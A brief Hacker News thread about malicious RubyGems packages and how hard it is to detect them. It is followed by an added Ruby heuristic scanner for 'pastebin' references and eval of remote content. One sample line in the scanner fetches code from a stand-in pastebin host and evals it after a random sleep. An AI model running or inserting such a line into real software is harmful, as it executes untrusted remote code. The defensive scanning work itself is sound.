by htns 2493 days ago
Seems rather similar to the strong_password case from a month back: https://news.ycombinator.com/item?id=20377136 . I wonder if anyone has checked basic things like scanning all of rubygems for "pastebin" or "eval( * http * )".

It surprises me a bit.

I'm wondering why RubyGems wouldn't implement some basic form of malware detection. This type of code shouldn't be too hard to classify.

Malicious users would just change their code slightly to get past it. Use a different service than pastebin, or just obfuscate it more.

After thinking about it, I think you must be right. Malware detection is not an easy task, especially because of Ruby's dynamic nature.

Even simple open(), sleep(), eval() could be easily obfuscated.
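
The scan suggested in the first comment, sketched as an added example that is not part of the thread or of any RubyGems tooling: a line-based heuristic that flags the literal "pastebin" and `eval` applied to remotely fetched content in unpacked gem sources. The rule names, the `Finding` struct and the sample files are constructed for illustration; as the replies point out, matching of this kind only catches unobfuscated code, so a hit is a lead for manual review and a clean result proves nothing.

```ruby
# Heuristic rules taken from the first comment: the literal "pastebin" and
# eval() applied to something fetched over HTTP. Rule names are made up here.
RULES = {
  "pastebin-reference"     => /pastebin/i,
  "eval-of-remote-content" =>
    %r{\beval\s*\(?[^\n]*(https?://|Net::HTTP|URI\.open|\bopen\s*\()}i,
}.freeze

Finding = Struct.new(:path, :line_no, :rule, :text)

# Scan one source string line by line and return an array of Finding.
def scan_source(path, source)
  findings = []
  source.each_line.with_index(1) do |line, no|
    next if line.strip.start_with?("#") # comment-only lines are not executed
    RULES.each do |name, pattern|
      findings << Finding.new(path, no, name, line.strip) if line =~ pattern
    end
  end
  findings
end

# Scan every .rb file under a directory of unpacked gems (e.g. `gem unpack`).
# Files are read as raw bytes so odd encodings cannot abort the scan.
def scan_tree(root)
  Dir.glob(File.join(root, "**", "*.rb")).sort.flat_map do |path|
    scan_source(path, File.binread(path))
  end
end

# Constructed sample sources (not taken from any real gem).
SAMPLES = {
  "benign.rb"     => "require 'json'\ndef parse(s)\n  JSON.parse(s)\nend\n",
  "suspicious.rb" => "require 'open-uri'\nsleep(rand * 3600)\n" \
                     "eval(open('http://pastebin.example/raw/PLACEHOLDER').read)\n",
}.freeze

if __FILE__ == $PROGRAM_NAME
  SAMPLES.each do |name, src|
    hits = scan_source(name, src)
    puts "#{name}: #{hits.empty? ? 'no findings' : ''}"
    hits.each { |f| puts "  line #{f.line_no} [#{f.rule}] #{f.text}" }
  end
end
```
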